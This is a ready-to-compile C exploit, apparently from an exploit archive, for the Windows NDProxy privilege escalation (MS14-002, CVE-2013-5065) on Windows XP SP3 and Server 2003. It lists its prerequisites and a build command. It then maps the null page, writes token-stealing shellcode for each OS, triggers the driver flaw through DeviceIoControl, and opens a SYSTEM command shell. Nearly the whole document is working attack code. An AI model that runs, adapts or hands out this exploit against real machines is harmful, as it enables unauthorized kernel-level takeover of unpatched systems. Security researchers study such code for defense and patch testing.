MS14-002 Windows NDProxy Privilege Escalation

`/*  
################################################################  
# Exploit Title: Windows NDProxy Privilege Escalation (MS14-002)  
# Date: 2015-08-03  
# Exploit Author: Tomislav Paskalev  
# Vulnerable Software:  
# Windows XP SP3 x86  
# Windows XP SP2 x86-64  
# Windows 2003 SP2 x86  
# Windows 2003 SP2 x86-64  
# Windows 2003 SP2 IA-64  
# Supported vulnerable software:  
# Windows XP SP3 x86  
# Windows 2003 SP2 x86  
# Tested on:  
# Windows XP SP3 x86 EN  
# Windows 2003 SP2 x86 EN  
# CVE ID: 2013-5065  
################################################################  
# Vulnerability description:  
# NDPROXY is a system-provided driver that interfaces WAN  
# miniport drivers, call managers, and miniport call managers  
# to the Telephony Application Programming Interfaces (TAPI)  
# services.  
# The vulnerability is caused when the NDProxy.sys kernel  
# component fails to properly validate input.  
# An attacker who successfully exploited this vulnerability  
# could run arbitrary code in kernel mode (i.e. with SYSTEM  
# privileges).  
################################################################  
# Exploit notes:  
# Privileged shell execution:  
# - the SYSTEM shell will spawn within the existing shell  
# (i.e. exploit usable via a remote shell)  
# Exploit compiling:  
# - # i586-mingw32msvc-gcc MS14-002.c -o MS14-002.exe  
# Exploit prerequisites:  
# - low privilege access to the target (remote shell or RDP)  
# - target not patched (KB2914368 not installed)  
# - service "Routing and Remote Access" running on the target  
# - "Power User" user group can start and stop services  
# - > sc query remoteaccess  
# - > sc start remoteaccess  
################################################################  
# Thanks to:  
# Andy (C PoC - Win XP SP3)  
# ryujin (Python PoC - Win XP SP3)  
################################################################  
# References:  
# http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5065  
# https://technet.microsoft.com/en-us/library/security/ms14-002.aspx  
# https://penturalabs.wordpress.com/2013/12/11/ndproxy-privilege-escalation-cve-2013-5065/  
# https://www.exploit-db.com/exploits/30014/  
# https://msdn.microsoft.com/en-us/library/windows/desktop/ms681674%28v=vs.85%29.aspx  
# https://msdn.microsoft.com/en-us/library/windows/desktop/aa363858%28v=vs.85%29.aspx  
# https://msdn.microsoft.com/en-us/library/windows/desktop/ms681381%28v=vs.85%29.aspx  
# https://msdn.microsoft.com/en-us/library/windows/desktop/aa363216%28v=vs.85%29.aspx  
################################################################  
*/  
  
#include <windows.h>  
#include <stdio.h>  
#include <stdlib.h>  
  
  
  
typedef struct {  
PVOID Unknown1;  
PVOID Unknown2;  
PVOID Base;  
ULONG Size;  
ULONG Flags;  
USHORT Index;  
USHORT NameLength;  
USHORT LoadCount;  
USHORT PathLength;  
CHAR ImageName[256];  
} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;  
  
  
typedef struct {  
ULONG Count;  
SYSTEM_MODULE_INFORMATION_ENTRY Module[1];  
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;  
  
  
typedef enum _SYSTEM_INFORMATION_CLASS {  
SystemModuleInformation = 11,  
SystemHandleInformation = 16  
} SYSTEM_INFORMATION_CLASS;  
  
  
typedef DWORD NTSTATUS;  
NTSTATUS (WINAPI *_NtQuerySystemInformation) (SYSTEM_INFORMATION_CLASS SystemInformationClass,  
PVOID SystemInformation,  
ULONG SystemInformationLength,  
PULONG ReturnLength);  
  
  
  
static VOID InitFirstPage (void)  
{  
PVOID BaseAddress;  
ULONG RegionSize;  
NTSTATUS ReturnCode;  
FARPROC NtAllocateVirtualMemory;  
  
NtAllocateVirtualMemory = GetProcAddress (GetModuleHandle ("NTDLL.DLL"), "NtAllocateVirtualMemory");  
  
fprintf (stderr, "[+] NtAllocateVirtualMemory@%p\n", NtAllocateVirtualMemory);  
RegionSize = 0xf000;  
BaseAddress = (PVOID) 0x00000001;  
ReturnCode = NtAllocateVirtualMemory (GetCurrentProcess (),  
&BaseAddress,  
0,  
&RegionSize,  
MEM_COMMIT | MEM_RESERVE,  
PAGE_EXECUTE_READWRITE);  
if (ReturnCode != 0)  
{  
fprintf (stderr, "[-] NtAllocateVirtualMemory() failed to map first page\n");  
fprintf (stderr, " Error code: %#X\n", ReturnCode);  
fflush (stderr);  
ExitProcess (1);  
}  
fprintf (stderr, "[+] BaseAddress: %p, RegionSize: %#x\n", BaseAddress, RegionSize), fflush (stderr);  
FillMemory (BaseAddress, RegionSize, 0x41);  
return;  
}  
  
  
  
int exploit (unsigned char *shellcode)  
{  
DWORD writtenBytes;  
int returnValue;  
  
InitFirstPage ();  
  
unsigned char *shellcodeBuffer;  
shellcodeBuffer = (char *) malloc (400);  
memset (shellcodeBuffer, (int) "xCC", 400);  
memcpy (shellcodeBuffer, shellcode, 112);  
  
returnValue = WriteProcessMemory ((HANDLE) 0xFFFFFFFF, (LPVOID) 0x00000001, shellcodeBuffer, 0x400, &writtenBytes);  
if (returnValue == 0)  
{  
printf ("[-] Attempt to map memory_write failed\n");  
printf (" Error code: %d\n", GetLastError ());  
exit(1);  
}  
HANDLE ndProxyDeviceHandle = CreateFileA ("\\\\.\\NDProxy", 0, 0, NULL, OPEN_EXISTING, 0, NULL);  
if (ndProxyDeviceHandle == INVALID_HANDLE_VALUE)  
{  
printf ("[-] Creating a device handle on NDProxy failed\n");  
printf (" Error code: %d\n", GetLastError());  
exit (0);  
}  
DWORD inputBuffer [0x15] = {0};  
DWORD returnedBytes = 0;  
*(inputBuffer + 5) = 0x7030125;  
*(inputBuffer + 7) = 0x34;  
DeviceIoControl (ndProxyDeviceHandle, 0x8fff23cc, inputBuffer, 0x54, inputBuffer, 0x24, &returnedBytes, 0);  
CloseHandle (ndProxyDeviceHandle);  
system ("cmd.exe /T:C0 /K cd c:\\windows\\system32");  
return 0;  
}  
  
  
  
int main (int argc, char **argv)  
{  
if (argc != 2)  
{  
printf ("[*] Usage: %s OS_TYPE\n", argv[0]);  
printf (" supported OS_TYPE:\n");  
printf (" XP - Windows XP SP3 x86\n");  
printf (" 2k3 - Windows 2003 SP2 x86\n");  
printf ("[*] Note: the service \"Routing and Remote Access\"\n");  
printf (" must be running on the target machine\n");  
exit (0);  
}  
else  
{  
if ((strcmp (argv[1], "xp") == 0) || (strcmp (argv[1], "XP") == 0))  
{  
unsigned char shellcodeXP[] =  
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"  
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"  
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"  
"\x90\x90\x90\x90\x90\x90\x90\x90\x3C\x00\x00\x00\x90\x90\x90\x90"  
"\x90\x33\xC0\x64\x8B\x80\x24\x01\x00\x00\x8B\x40\x44\x8B\xC8\x8B"  
"\x80\x88\x00\x00\x00\x2D\x88\x00\x00\x00\x83\xB8\x84\x00\x00\x00"  
"\x04\x75\xEC\x8B\x90\xC8\x00\x00\x00\x89\x91\xC8\x00\x00\x00\xC3";  
exploit (shellcodeXP);  
}  
else if ((strcmp (argv[1], "2k3") == 0) || (strcmp (argv[1], "2K3") == 0))  
{  
unsigned char shellcode2k3[] =  
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"  
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"  
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"  
"\x90\x90\x90\x90\x90\x90\x90\x90\x3C\x00\x00\x00\x90\x90\x90\x90"  
"\x90\x33\xC0\x64\x8B\x80\x24\x01\x00\x00\x8B\x40\x38\x8B\xC8\x8B"  
"\x80\x98\x00\x00\x00\x2D\x98\x00\x00\x00\x83\xB8\x94\x00\x00\x00"  
"\x04\x75\xEC\x8B\x90\xD8\x00\x00\x00\x89\x91\xD8\x00\x00\x00\xC3";  
exploit (shellcode2k3);  
}  
else  
{  
printf ("[-] Invalid argument\n");  
printf (" Argument used: %s\n", argv[1]);  
exit(0);  
}  
}  
}  
  
`